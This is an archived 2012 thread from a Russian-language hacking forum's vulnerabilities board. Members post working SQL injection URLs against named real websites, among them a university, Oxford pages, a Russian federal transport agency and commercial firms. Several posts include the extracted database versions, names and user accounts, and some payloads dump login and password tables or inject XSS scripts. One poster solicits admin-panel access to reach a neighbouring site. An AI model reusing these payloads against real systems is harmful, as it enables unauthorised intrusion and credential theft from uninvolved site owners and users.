HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15111  
Старый 01.07.2012, 03:01
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

ТИЦ == 10, PR == 5, DMOZ == true(Monterey » Business and Economy);

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.backscatter.com/learn/article/article.php?ID=57+and+(select+1+from(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--[/COLOR][/COLOR] 
ТИЦ == 10, PR == 6;

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.gqrr.com/index.php?ID=-408+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(version())),14--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15112  
Старый 01.07.2012, 14:05
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию

Кадровый клуб Санкт-Петербурга.

Код:
Code:
http://www.kkspb.ru/index.php?id_category=1+UNION+SELECT+1,2,3,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),5,6,7,8,9,10--
Database Version: 4.1.22-lk-log

Database name: kkspbru

User name: kkspbru@localhost

ТИЦ: 20

PR: 0


Путеводитель по отелям и гостиницам.

Код:
Code:
http://www.hotelstop.ru/opinn1.php?num=1-1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3--
Вывод в титле.

Database Version: 4.0.27-log

Database name: delinform

User name: delinform@localhost

ТИЦ: 40

PR: 3


Недвижимость Кирова.

Код:
Code:
http://www.homekirov.ru/read_news.php?num=1-1.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9--
Database Version: 5.1.58-log

Database name: cl26429_home

User name: cl26429_home@localhost

ТИЦ: 10

PR: 2


Интернет портал СНГ.

Код:
Code:
http://e-cis.info/index.php?id=1+UNION+SELECT+1,2,3,4,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),6,7,8,9--
File_Priv = Y


Database Version: 5.0.67-community-nt

Database name: info

User name: ispolkom@localhost

ТИЦ: 40

PR: 5


Сиамский университет.

Код:
Code:
http://admission.siam.edu/board/board_topic_detail.php?tid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),11,12--
Database Version: 5.0.95

Database name: SIAM_ADMISSION

User name: siam_admission@localhost

ТИЦ: 0

PR: 4


Фан-сайт Сталина.

Код:
Code:
http://www.stalinproject.com/secondary.php?id_subject=1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6--
Database Version: 5.0.27-standard

Database name: StalinProject

User name: root@localhost

ТИЦ: 0

PR: 4


ООО "Пермрегионгаз"

Код:
Code:
http://www.prg.perm.ru/index.php?Template=NewsDetail&MessageID=1+UNION+SELECT+1,2,3,4,5,6,7,8,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Database Version: 5.1.42

Database name: prg_prg

User name: prg_prg@localhost

ТИЦ: 20

PR: 3


Интернет-аукцион антиквариата.

Код:
Code:
http://www.antikwariat.ru/categories.php?parent_id=2000+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3+LIMIT+1,1--
Вывод в титле.

Database Version: 5.1.61

Database name: antikwar

User name: antikwar_user@localhost

ТИЦ: 250

PR: 4
 
Ответить с цитированием

  #15113  
Старый 02.07.2012, 13:55
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.filmmakersjournal.co.uk/article.php?id=-4+union+select+1,'%3Cscript%3Ealert('XSS')%3C/script%3E',3,4,5,6,7,8,9--+f
Оксфорд

Цитата:
Сообщение от None  
http://festivals.mml.o[google]x.ac.uk/index.php?page=view_single&id=-1+union+select+1,2,(select(@n)from(select(@n:=0x20 ),(select(null)from(festivals.users)where(@n:=conc at(@n,0x3c62723e,username,0x3a,password))))n),4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24--+f
Пасивка на оксфорде

Цитата:
Сообщение от None  
http://festivals.mml.ox.ac.uk/index.php?page=view_single&id=-1+union+select+1,2,0x3c7363726970743e616c657274282 93c2f7363726970743e,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24--+f
 
Ответить с цитированием

  #15114  
Старый 03.07.2012, 01:53
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

Астрологический институт Павла Глобы, лол.

ТИЦ == 10, PR == 2;

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//globainstitut.ru/index.php?id=-16+union+select+1,2,3,4,5,6,concat_ws(0x03a,login,password),8+from+users--[/COLOR][/COLOR] 
Вывод в source.

PR == 5;

Cобственно, Oracle. У кого есть желание из спортивного интереса поковыряться - вот наглядный пример. Число колонок подобрано, равно как и выявлено принтабельное поле. Дальше лень

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.observacoop.org.mx/ActoresListado.php?id_actor=-581+union+select+null,to_char(777),null,null,null,null,null,null,null,null,null,null,null,null,null+from+sys.dual--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15115  
Старый 03.07.2012, 06:42
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию

Федеральное агентство морского и речного транспорта.

Код:
Code:
http://www.morflot.ru/index.php?news_id=1-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),4--
Database Version: 5.0.67

Database name: morflot

User name: root@localhost

ТИЦ: 1200

PR: 6


Международное евразийское движение.

Код:
Code:
http://evrazia.info/modules.php?name=News&file=article&sid=1-1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11,12,13,14--
Database Version: 5.1.61

Database name: evrazia

User name: evrazia@web.evrazia.org

ТИЦ: 130

PR: 4
 
Ответить с цитированием

  #15116  
Старый 03.07.2012, 20:20
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

Юридическая компания "Богатовъ и К"

Цитата:
Сообщение от None  
http://www.bogatoff.ru/law_news/?article=-226+uNioN+SeleCt+group_concat(table_name+separator +0x3c62723e)+from+information_schema.tables+where+ table_schema=0x75313730343831+--+
MySQL >5.

Если кто в админку зайдет постучите в личку плиз, мне сосед его по IP нужен.

________________________________________

Заказ и доставка билетов:

Цитата:
Сообщение от None  
http://biletoff.ru/index.php?cat=1056&scheme=-4+uNioN+sElecT+group_concat(table_name+separator+0 x3c62723e)+from+information_schema.tables+where+ta ble_schema=0x75313431313736+--+
MySQL >5, phpinfo: http://biletoff.ru/info.php
 
Ответить с цитированием

  #15117  
Старый 03.07.2012, 23:23
^NSA^
Guest
Сообщений: n/a
Провел на форуме:
19040

Репутация: 32
По умолчанию

Новости

Цитата:
Сообщение от None  
http://www.visitcorvallis.com/index.php?action=events_info&rowid=7260 and 1=convert(numeric,(select max(convert(char,linkurl)||0x3a||convert(char,thed ate)) from yourbuilderlinksn..news))--
unisep

Цитата:
Сообщение от None  
http://www.unisep.edu.br/graduacao.php?id=9 and 1=(select first+1+cast(BAN_NOME+||+BAN_FOTO+as+char(255))+fr om+BANNER)
 
Ответить с цитированием

  #15118  
Старый 05.07.2012, 00:47
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

ТИЦ == 100, PR == 2, ЯK == true, DMOZ == true;

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.varvara-music.ru/press.html?id=77777+union+select+1,2,3,concat_ws(0x03a,database(),user(),version()),5,6,7,8,9,10,11,12--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15119  
Старый 05.07.2012, 03:10
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию

Любителям хардкора посвящается:

pr=4

cy=10

dmoz=true

Цитата:
Сообщение от None  
http://www.zuerigay.ch/gallery/de/galpicshow.php?id=5572+and+1=0+union+select+1,2,3, concAt_ws%280x3a,user,pw,pval,paid%29,5,6,7,8,9,10 ,11,12,13,14,15,16,17+from+member+limit+0,1+--+
 
Ответить с цитированием

  #15120  
Старый 05.07.2012, 04:50
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765

Репутация: 257
Отправить сообщение для A_n_d_r_e_i с помощью ICQ
По умолчанию

Хардкора говоришь?

http://pornman.ru/onload2.php?p2=-18+union+select+1,2,3,4,5,6,7,8,9,10--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ